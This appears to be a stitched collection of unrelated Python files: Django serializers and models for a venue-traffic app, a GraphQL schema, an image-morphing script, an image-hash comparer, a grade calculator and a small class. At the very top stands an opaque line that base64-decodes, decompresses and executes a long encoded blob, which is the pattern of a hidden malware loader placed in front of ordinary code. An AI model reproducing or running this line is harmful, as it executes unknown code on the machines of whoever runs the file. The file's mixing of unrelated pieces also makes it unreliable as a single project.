exec(zlib.decompress(base64.b64decode("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"))) |
from rest_framework import serializers
from .models import User, Chat, Message
class UserSerializer(serializers.ModelSerializer):
    """Serializes every field of the User model."""
    class Meta:
        model = User
        fields = '__all__'
class ChatSerializer(serializers.ModelSerializer):
    """Full Chat representation; membership is read/written as User pk lists."""
    # Many-to-many chat membership exposed as primary keys.
    users = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=True)
    class Meta:
        model = Chat
        fields = '__all__'
class ChatShowSerializer(serializers.ModelSerializer):
    """Narrow Chat view exposing membership under the singular key 'user'."""
    # NOTE(review): many=False on a many-to-many source ('users') — confirm
    # this is intended; a chat with several members may not serialize cleanly.
    user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False, source='users')
    class Meta:
        model = Chat
        fields = ['user']
class MessageSerializer(serializers.ModelSerializer):
    """Full Message representation; chat and author are written as pks."""
    chat = serializers.PrimaryKeyRelatedField(queryset=Chat.objects.all(), many=False)
    author = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), many=False)
    class Meta:
        model = Message
        fields = '__all__'
class MessageShowSerializer(serializers.ModelSerializer):
    """Narrow Message view exposing only the owning chat's pk."""
    chat = serializers.PrimaryKeyRelatedField(queryset=Chat.objects.all(), many=False)
    class Meta:
        model = Message
        fields = ['chat']
|
from ariadne import gql
# GraphQL SDL for the Cozmo service: cozmoSpeak speaks a sentence on the
# robot identified by `id`; random_animation triggers animations.
# gql() validates the schema string at import time.
type_defs = gql("""
input CozmoSpeakInput {
id: ID!
sentence: String!
}
input RandomAnimationInput {
id: ID!
}
type Query {
cozmoSpeak(input: CozmoSpeakInput): String,
random_animation(input:RandomAnimationInput): [String]
}
""")
|
# Live-data switch for the BestTime API integration (see Location.updateData).
TEST = False #WARNING: Setting to False will use LIVE DATA that can incur a cost! Please only set to False when live data tests are needed! For testing data, edit the values in sampleresponse.json instead!
# Canned API response used when TEST is True.
TESTRESPONSE = "yWait/sampleresponse.json"
from django.db import models
from django.contrib.auth.models import User
from datetime import datetime
from django.db.models.signals import pre_delete, pre_save
from django.dispatch import receiver
import json, os, requests
#Data object
class pureData():
    """In-memory holder for one week (7 entries per key) of venue traffic data."""
    def __init__(self):
        week = 7
        self.data = {
            'epoch': 0,
            # One quiet-hours list per day; distinct lists, not aliases.
            'hour': [[] for _ in range(week)],
            'closed': [True, False, False, False, False, False, True],
            'address': ['' for _ in range(week)],
            'name': ['' for _ in range(week)],
        }
#Actual data from API regarding location traffic.
class trafficData(models.Model):
    """Raw traffic payload for a venue, persisted as a JSON text blob."""
    # Serialized pureData.data dict (written by Location/ComparisonSet.updateData).
    jsonData = models.TextField(default = '')
    def jsonToData(self):
        """Deserialize jsonData back into a dict; raises if the field is empty."""
        output = json.loads(self.jsonData)
        return output
    def __str__(self):
        return str(self.pk) + ' trafficData'
#A location object
class Location(models.Model):
    """A venue whose quiet-hours forecast is fetched from the BestTime API."""
    #Name of venue passed to API (also user friendly name)
    venueName = models.CharField(max_length=256, unique=True)
    #Address of venue passed to API
    venueAddress = models.TextField()
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    #Traffic data for this venue
    data = models.ForeignKey(trafficData, on_delete = models.SET_NULL, null=True, blank=True)
    def updateData(self):
        """Refresh self.data from the BestTime API (or the canned TEST file).

        Invoked from the pre_save signal below; deliberately does NOT call
        self.save() itself. Raises KeyError if APIKEY is unset in live mode.
        """
        outData = pureData()
        if TEST == False:
            #call API and gather data
            apiKey = os.environ['APIKEY']
            url = "https://besttime.app/api/v1/forecasts"
            params = {
                'api_key_private' : apiKey,
                'venue_name': self.venueName,
                'venue_address' : self.venueAddress
            }
            responseData = requests.request("POST",url, params=params).text
            unParsed = json.loads(responseData)
            #To ensure API usage is consistent with expectations, address will be pulled from API
            self.venueAddress = unParsed["venue_info"]["venue_address"]
        else:
            #TEST RESPONSE#
            responseData = ""
            with open(TESTRESPONSE, "r") as f:
                responseData = f.read()
        #parse API data for needed information
        unParsed = json.loads(responseData)
        outData.data['epoch'] = int(unParsed["epoch_analysis"])
        for i in range(7): #API response is broken down as a list of days.
            outData.data['address'][i] = self.venueAddress
            outData.data['name'][i] = self.venueName
            if unParsed['analysis'][i]['day_info']['venue_open'] == 'Closed':
                outData.data['closed'][i] = True
            else:
                outData.data['hour'][i] = unParsed['analysis'][i]['quiet_hours']
                outData.data['closed'][i] = False
        #Delete old data, if it exists (data FK is nullable; SET_NULL would orphan it)
        if self.data is not None:
            trafficData.objects.get(pk=self.data.pk).delete()
        #create trafficData using parsed information and assign it to the object.
        trafData = trafficData(jsonData = json.dumps(outData.data))
        trafData.save()
        self.data = trafData
    def __str__(self):
        return self.venueName
#Set of locations to be compared.
class ComparisonSet(models.Model):
    """A named group of Locations compared day-by-day on quiet hours."""
    name = models.CharField(max_length=200, unique=True)
    author = models.ForeignKey(User, on_delete=models.CASCADE)
    #Traffic data for this comparison set
    data = models.ForeignKey(trafficData, on_delete= models.SET_NULL, null=True, blank=True)
    #Comparisons for the Location objects
    locations = models.ManyToManyField(Location, related_name='compLocations')
    def updateData(self):
        """Pick one 'best' open location per day and persist the aggregate."""
        outData = pureData()
        for i in range(7):
            smallestCount = 0
            smallestLocData = None
            for locale in self.locations.all():
                locData = locale.data.jsonToData()
                # NOTE(review): with smallestCount starting at 0 and a >= test,
                # this selects the open location with the MOST quiet hours,
                # despite the "smallest" naming — confirm which is intended.
                if len(locData['hour'][i]) >= smallestCount and not locData['closed'][i] :
                    smallestCount = len(locData['hour'][i])
                    smallestLocData = locData
            if smallestLocData is None:
                # Every location is closed that day.
                outData.data['hour'][i] = []
                outData.data['closed'][i] = True
                outData.data['address'][i] = '-'
                outData.data['name'][i] = '-'
            else:
                outData.data['hour'][i] = smallestLocData['hour'][i]
                outData.data['closed'][i] = smallestLocData['closed'][i]
                outData.data['address'][i] = smallestLocData['address'][i]
                outData.data['name'][i] = smallestLocData['name'][i]
        outData.data['epoch'] = datetime.now().timestamp()
        #Delete old data, if it exists
        if self.data is not None:
            trafficData.objects.get(pk=self.data.pk).delete()
        #Create trafficData using information found
        trafData = trafficData(jsonData = json.dumps(outData.data))
        trafData.save()
        self.data = trafData
        self.save()
    def __str__(self):
        return self.name
@receiver(pre_delete,sender=Location, dispatch_uid="delete data Location")
@receiver(pre_delete,sender=ComparisonSet, dispatch_uid="delete data ComparisonSet")
def deleteDataSignal(sender,instance,using,**kwargs):
    """Delete the trafficData row owned by a Location/ComparisonSet being removed.

    The data FK uses on_delete=SET_NULL, so the payload row must be cleaned
    up explicitly here to avoid orphaned trafficData records.
    """
    # Fix: data is a nullable FK — e.g. a ComparisonSet whose updateData()
    # never ran has data=None, and the previous unguarded lookup raised
    # AttributeError on instance.data.pk during deletion.
    if instance.data is not None:
        trafficData.objects.get(pk=instance.data.pk).delete()
@receiver(pre_save, sender=Location, dispatch_uid="save data Location")
def updateDataSignal(sender, instance, using, **kwargs):
    # Refresh traffic data on EVERY save; when TEST is False this hits the
    # paid BestTime API once per save (see Location.updateData).
    instance.updateData()
|
# Read two grades, average them, and report pass ("Passou") or fail ("Reprovou").
n1 = float(input('Digite a primeira nota: '))
n2 = float(input('Digite a segunda nota: '))
media = (n1 + n2) / 2
print('Passou' if media >= 6.0 else 'Reprovou')
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
import copy
import argparse
from scipy.spatial import Delaunay
# CLI for the morphing pipeline: source/destination images, number of
# intermediate frames (k) and the output path prefix.
parser=argparse.ArgumentParser(description='Image Morphing')
parser.add_argument('--source', dest='source_image', help="Enter Source Image Path", required=True, type=str)
parser.add_argument('--dest', dest='destination_image', help="Enter Dest Image Path", required=True, type=str)
parser.add_argument('--k', dest='k', help="Enter no. of Intermediate Images", default=10, type=int)
parser.add_argument('--output', dest='output_image_path', help="Enter Output Image Path", required=True, type=str)
args=parser.parse_args()
src_img=cv2.imread(args.source_image, cv2.IMREAD_COLOR)
dest_img=cv2.imread(args.destination_image, cv2.IMREAD_COLOR)
# Fail early with a clear message: cv2.imread returns None (no exception)
# for a missing/unreadable file, which previously crashed on .shape below.
if src_img is None or dest_img is None:
    print("Error: Could not read source/destination image")
    exit(1)
src_height, src_width, src_depth=src_img.shape
dest_height, dest_width, dest_depth=dest_img.shape
if(src_depth!=dest_depth):
    # Fix: message typo ("Errot") and a non-zero exit status on the error path.
    print("Error: Incorrect Color Channels")
    exit(1)
depth=src_depth
src_window_name="get_source_features"
dest_window_name="get_dest_features"
morphing_window="morphing"
# Feature points clicked by the user, stored as (row, col).
src_points=[]
dest_points=[]
# BGR Color Channel
def src_getPoints(event, x, y, flags, param):
    """Mouse callback: double-click records a source feature point."""
    global src_points, src_img
    if event != cv2.EVENT_LBUTTONDBLCLK:
        return
    print(x, y)
    # Stored as (row, col) = (y, x) to match image indexing.
    src_points.append((y, x))
    cv2.circle(src_img, (x, y), 2, (0, 0, 255), 2)
    cv2.imshow(src_window_name, src_img)
def dest_getPoints(event, x, y, flags, param):
    """Mouse callback: double-click records a destination feature point."""
    global dest_points, dest_img
    if event != cv2.EVENT_LBUTTONDBLCLK:
        return
    print(x, y)
    # Stored as (row, col) = (y, x) to match image indexing.
    dest_points.append((y, x))
    cv2.circle(dest_img, (x, y), 2, (0, 0, 255), 2)
    cv2.imshow(dest_window_name, dest_img)
def get_features():
    """Interactively collect matching feature points on both images.

    Shows both images; the user double-clicks corresponding features in each
    window and presses Esc when done. The point lists are truncated to the
    same length and the four image corners are appended so the Delaunay
    triangulation covers the whole frame.
    """
    global src_points, src_img, dest_points, dest_img
    cv2.namedWindow(src_window_name)
    cv2.setMouseCallback(src_window_name, src_getPoints)
    cv2.namedWindow(dest_window_name)
    cv2.setMouseCallback(dest_window_name, dest_getPoints)
    cv2.imshow(src_window_name, src_img)
    cv2.imshow(dest_window_name, dest_img)
    while (1):
        k = cv2.waitKey(20) & 0xFF
        if k == 27:  # Esc ends point picking
            break
    cv2.destroyAllWindows()
    # Fix: pair up the clicked POINTS. The old code truncated with
    # min(len(src_img), len(dest_img)) — the image HEIGHTS — which was
    # effectively a no-op, so unequal click counts broke the morph later.
    final_size = min(len(src_points), len(dest_points))
    src_points = src_points[0:final_size]
    dest_points = dest_points[0:final_size]
    src_points.append((0, 0))
    src_points.append((0, src_width))
    src_points.append((src_height, 0))
    src_points.append((src_height, src_width))
    dest_points.append((0, 0))
    dest_points.append((0, dest_width))
    dest_points.append((dest_height, 0))
    dest_points.append((dest_height, dest_width))
def getPos(points, baricentric_coord, triangle_indices):
    """Map barycentric coordinates w.r.t. a triangle back to a 2-D position.

    Returns sum_i bary[i] * points[tri[i]] as a numpy array of shape (2,).
    """
    pts = np.array(points)
    weighted = (baricentric_coord[i] * pts[triangle_indices[i]] for i in range(3))
    return sum(weighted, np.zeros([2]))
def interpolate(pos, img, h, w):
    """Bilinearly sample *img* at fractional position *pos* = (row, col).

    Falls back to the floor pixel on the bottom/right border where a full
    2x2 neighborhood is unavailable. Returns a uint8 pixel vector.
    """
    (inter_h, inter_w) = pos
    index_h = int(inter_h)
    index_w = int(inter_w)
    if index_h >= h - 1 or index_w >= w - 1:
        return img[index_h, index_w, :]
    # Fix: np.float was removed in NumPy 1.24 — use np.float64 explicitly.
    topleft = img[index_h, index_w, :].astype(np.float64)
    topright = img[index_h, index_w + 1, :].astype(np.float64)
    bottomleft = img[index_h + 1, index_w, :].astype(np.float64)
    bottomright = img[index_h + 1, index_w + 1, :].astype(np.float64)
    # Horizontal lerps on the two rows, then a vertical lerp between them.
    interpolate_1 = topright * (inter_w - index_w) + topleft * (index_w + 1 - inter_w)
    interpolate_2 = bottomright * (inter_w - index_w) + bottomleft * (index_w + 1 - inter_w)
    final_interpolate = interpolate_2 * (inter_h - index_h) + interpolate_1 * (index_h + 1 - inter_h)
    final_interpolate = final_interpolate.astype(np.uint8)
    return final_interpolate
get_features()
# Reload the originals — the click callbacks drew red circles on them.
src_img=cv2.imread(args.source_image, cv2.IMREAD_COLOR)
dest_img=cv2.imread(args.destination_image, cv2.IMREAD_COLOR)
# cv2.namedWindow(morphing_window)
# Frame 0 is the source, frame k+1 the destination.
cv2.imwrite(args.output_image_path+str(0)+".jpg",src_img)
cv2.imwrite(args.output_image_path+str(args.k+1)+".jpg",dest_img)
for i in range(args.k):
    print(i+1)
    # Blend weights: rig_wt ramps 1/(k+1) .. k/(k+1) toward the destination.
    rig_wt=(i+1)/float(args.k+1)
    lef_wt=1.0-rig_wt
    new_width=int(lef_wt*src_width+rig_wt*dest_width)
    new_height=int(lef_wt*src_height+rig_wt*dest_height)
    interim_image=np.zeros([new_height,new_width,depth])
    interim_points=[]
    total_feature_points=len(src_points)
    # Linearly interpolate each matched feature-point pair for this frame.
    for ii in range(total_feature_points):
        interim_r=int(src_points[ii][0]*lef_wt+dest_points[ii][0]*rig_wt)
        interim_c=int(src_points[ii][1]*lef_wt+dest_points[ii][1]*rig_wt)
        interim_points.append((interim_r,interim_c))
    triangulation=Delaunay(interim_points)
    triangulation_indices=triangulation.simplices
    # interim_points=np.array(interim_points)
    # plt.triplot(interim_points[:,0], interim_points[:,1], triangulation.simplices.copy())
    # plt.plot(interim_points[:,0], interim_points[:,1], 'o')
    # plt.show()
    all_points=[]
    for h in range(new_height):
        for w in range(new_width):
            all_points.append((h,w))
    all_points=np.array(all_points)
    # Barycentric coordinates of every pixel w.r.t. its containing triangle,
    # computed in bulk from scipy's affine transform per simplex.
    point_index=triangulation.find_simplex(all_points)
    X=triangulation.transform[point_index,:2]
    Y=all_points - triangulation.transform[point_index,2]
    baricentric_coord=np.einsum('ijk,ik->ij', X, Y)
    baricentric_coord=np.c_[baricentric_coord, 1 - baricentric_coord.sum(axis=1)]
    counter=0
    for h in range(new_height):
        for w in range(new_width):
            # Warp each pixel into both images and cross-dissolve the samples.
            src_pos=getPos(src_points,baricentric_coord[counter],triangulation_indices[point_index[counter]])
            dest_pos=getPos(dest_points,baricentric_coord[counter],triangulation_indices[point_index[counter]])
            counter+=1
            pixel_val=lef_wt*interpolate(src_pos,src_img,src_height,src_width)+rig_wt*interpolate(dest_pos,dest_img,dest_height,dest_width)
            interim_image[h,w,:]=pixel_val
    # cv2.imshow(morphing_window,interim_image)
    print(args.output_image_path+str(i+1)+".jpg")
    cv2.imwrite(args.output_image_path+str(i+1)+".jpg",interim_image)
# while (1):
#     k=cv2.waitKey(20) & 0xFF
#     if k == 27:
#         break
cv2.destroyAllWindows()
# NOTE(review): `imageio` is used below but never imported — as written this
# raises NameError; add `import imageio` at the top of the file. The
# filenames are also hard-coded "boy*.jpg" rather than derived from
# args.output_image_path — confirm intended.
filenames = ["boy0.jpg", "boy1.jpg", "boy2.jpg", "boy3.jpg", "boy4.jpg", "boy5.jpg", "boy6.jpg"]
images = []
for filename in filenames:
    images.append(imageio.imread(filename))
imageio.mimsave("final.gif", images)
# cv2.imwrite(args.output_image_path, final_img)
|
import cv2
import os
def calc_image_hash(filename):
    """Compute a 64-bit average-hash of an image as a 64-char '0'/'1' string."""
    image = cv2.imread(filename)
    # Shrink to 8x8, grayscale, then threshold against the mean intensity.
    resized = cv2.resize(image, (8, 8), interpolation=cv2.INTER_AREA)
    gray_image = cv2.cvtColor(resized, cv2.COLOR_BGR2GRAY)
    avg = gray_image.mean()
    ret, threshold_image = cv2.threshold(gray_image, avg, 255, 0)
    # One bit per pixel, row-major: '1' where the pixel is above average.
    bits = []
    for x in range(8):
        for y in range(8):
            bits.append("1" if threshold_image[x, y] == 255 else "0")
    return "".join(bits)
def compare_hash(hash_1pic, hash_2pic):
    """Return the percentage (rounded int) of positions where both hashes agree."""
    total = len(hash_1pic)
    mismatches = sum(1 for i in range(total) if hash_1pic[i] != hash_2pic[i])
    return round((1 - mismatches / total) * 100)
def compare_picture(original, test):
    """Compare two images given as raw bytes; return a 1-6 similarity mark.

    The bytes are written to temporary files (the hashing helper works on
    file paths), hashed, and the agreement percentage is bucketed:
    0-19% -> 1, ..., 80-99% -> 5, 100% -> 6.
    """
    import tempfile
    # Fix: unique temp files instead of fixed names in the CWD, so concurrent
    # comparisons (or an unwritable working directory) no longer collide.
    with tempfile.NamedTemporaryFile(suffix=".png", delete=False) as original_file:
        original_file.write(original)
        temp_origin = original_file.name
    with tempfile.NamedTemporaryFile(suffix=".png", delete=False) as test_file:
        test_file.write(test)
        temp_test = test_file.name
    try:
        hash1 = calc_image_hash(temp_test)
        hash2 = calc_image_hash(temp_origin)
    finally:
        # Clean up even if hashing fails (e.g. bytes are not a decodable image).
        os.remove(temp_test)
        os.remove(temp_origin)
    percent = compare_hash(hash1, hash2)
    mark = (percent // 20) + 1
    return mark
|
class Classroom:
    """Lightweight value object for a classroom record."""

    def __init__(self, class_id, name, room, owner_id):
        self.class_id = class_id
        self.name = name
        self.room = room
        self.owner_id = owner_id

    # Fix: declared as a static factory — previously this was a plain function
    # in the class body, so calling it on an INSTANCE passed the instance as
    # `json` and failed. Classroom.from_json(...) keeps working as before.
    @staticmethod
    def from_json(json):
        """Build a Classroom from an API dict with id/name/room/ownerId keys."""
        return Classroom(json['id'], json['name'], json['room'], json['ownerId'])
|
